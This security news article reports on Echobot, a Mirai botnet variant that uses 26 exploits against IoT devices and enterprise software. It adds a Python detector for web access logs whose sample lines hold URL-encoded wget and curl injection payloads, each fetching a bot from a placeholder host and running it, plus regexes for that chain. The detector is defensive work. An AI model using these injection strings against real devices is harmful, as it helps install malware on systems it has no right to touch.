Mirai Offspring "Echobot" Uses 26 Different Exploits

A recently discovered variant of the Mirai Internet of Things (IoT) malware uses a total of 26 different exploits for the infection phase, Akamai reports. 

Targeting improperly secured IoT devices, Mirai was first spotted in 2016 and had its source code published online in October that year. Numerous variants of the threat have emerged since, the most recent of which target more processor architectures and aim to infect devices in enterprise environments.

Dubbed Echobot, the latest variant of the botnet was observed earlier this month, when it included 18 exploits, eight of which were new to the Mirai code. The threat was also targeting a recently patched Oracle WebLogic remote code execution vulnerability (CVE-2019-2725).

Now, Akamai’s Larry Cashdollar says that a newer version of Echobot uses 26 different exploits for infection, most of which target well-known command execution vulnerabilities in various networked devices. No CVE numbers were assigned for some of the flaws, although public advisories for them had been published. 

The exploits targeted devices from ADM, Ubiquiti (AirOS), ASMAX, ASUS, Belkin, Blackbot, DD-WRT, Dell, D-Link, Dreambox, Geutebruck, Hootoo, Linksys, Netgear, Nuuo, Oracle, Realtek, Seowonintech, SuperSign, Umotion, VeraLite, VMware, wePresent, WIFICAM, Yealink, and ZeroShell.

Analysis of the malicious code revealed the inclusion of cross-application vulnerabilities, as botnet creators are no longer relying solely on devices with embedded OSes, such as routers, cameras, and DVRs. 

Enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) vulnerabilities are also targeted for infection and propagation of the malware. At the same time, the botnet developers are targeting unpatched legacy vulnerabilities, given the inclusion of an exploit for a 10-year-old flaw in ZeroShell.

The malware’s loader system is a virtual server hosted in Bulgaria on Neterra's cloud network. The binaries, which are hosted via FTP and HTTP, were recently updated and feature file timestamps of June 7. 
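Most of the exploits described above abuse command-execution bugs in web-facing device interfaces, and the loader then pulls the bot binary over FTP or HTTP. From a defender's side, that download-and-execute chain is visible in ordinary web access logs. The following is an added detection example written for this article, not code from Akamai or from the Echobot analysis; the log lines, IP addresses and URL paths are constructed, and the indicator regexes are this example's own heuristics rather than published signatures. It decodes the request target (twice, to unwrap double URL encoding) and flags a request only when a fetch command appears together with a shell metacharacter, so a benign URL that merely contains the word "wget" is not reported.

```python
"""Flag HTTP requests carrying a shell-injection payload that fetches and
runs a remote binary, the infection pattern Mirai-derived bots use against
command-execution flaws in device web interfaces.

Added example: sample log lines and regexes are constructed for illustration,
not taken from the article or from Akamai's report."""
import re
from urllib.parse import unquote_plus

# Constructed Apache/Nginx-style access log. Line 2 is a benign request that
# happens to contain "wget"; lines 3 and 4 carry injected download chains,
# the second one double URL-encoded. 198.51.100.x / 203.0.113.x are
# documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Jun/2019:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.10 - - [07/Jun/2019:10:01:03 +0000] "GET /docs/wget-manual.html HTTP/1.1" 200 9813
203.0.113.11 - - [07/Jun/2019:10:01:05 +0000] "GET /cgi-bin/status?host=%3Bwget+http%3A%2F%2F198.51.100.5%2Fbins%2Fbot.arm7+-O+%2Ftmp%2Fb%3Bchmod+777+%2Ftmp%2Fb%3B%2Ftmp%2Fb HTTP/1.1" 500 0
203.0.113.12 - - [07/Jun/2019:10:01:09 +0000] "GET /api/ping?ip=%253Bcurl+-s+http%253A%252F%252F198.51.100.7%252Fx.sh+%257C+sh HTTP/1.1" 200 17
"""

# One regex per stage of the chain: fetch a payload, chain commands with
# shell metacharacters, stage it in a writable directory, make it executable
# and run it.
FETCH = re.compile(r"\b(wget|curl|tftp|ftpget|ftp)\b", re.I)
SHELL_META = re.compile(r"(;|\|\||&&|\||`|\$\()")
STAGE_DIR = re.compile(r"/(tmp|var/tmp|dev/shm)/", re.I)
EXEC = re.compile(
    r"(chmod\s+(\+x|[0-7]{3,4})|\|\s*(ba)?sh\b|;\s*(\./|/tmp/|/var/tmp/|/dev/shm/))",
    re.I,
)

# Combined-log-format prefix: client, identity, user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_target(target):
    """URL-decode the request target twice so double-encoded payloads unwrap."""
    return unquote_plus(unquote_plus(target))


def classify(line):
    """Return per-stage indicator hits for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = {
        "fetch": bool(FETCH.search(decoded)),
        "shell_meta": bool(SHELL_META.search(decoded)),
        "staging_dir": bool(STAGE_DIR.search(decoded)),
        "exec": bool(EXEC.search(decoded)),
    }
    # A fetch verb alone is not enough (documentation URLs mention wget);
    # require it to co-occur with a shell metacharacter in the same target.
    suspicious = hits["fetch"] and hits["shell_meta"]
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "target": decoded,
        "hits": hits,
        "score": sum(hits.values()),
        "suspicious": suspicious,
    }


def scan(log_text):
    """Return the classified records for every suspicious request in the log."""
    records = (classify(line) for line in log_text.splitlines())
    return [r for r in records if r and r["suspicious"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(f"{r['timestamp']} {r['ip']} score={r['score']} {r['target']}")
```

The score counts how many stages of the chain are present, which is useful for triage: a request that fetches, stages under /tmp, chmods and executes is a stronger signal than one that only pipes a download to sh. In practice this runs over the logs of every web-facing device or appliance interface, since the article's list shows the exploit set is not limited to one vendor or product class.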

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they've added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten,” Cashdollar points out. 

Related: New Mirai Variant Targets More Processor Architectures

Related: New Mirai Variant Targets Enterprise IoT Devices


Original author: Ionut Arghire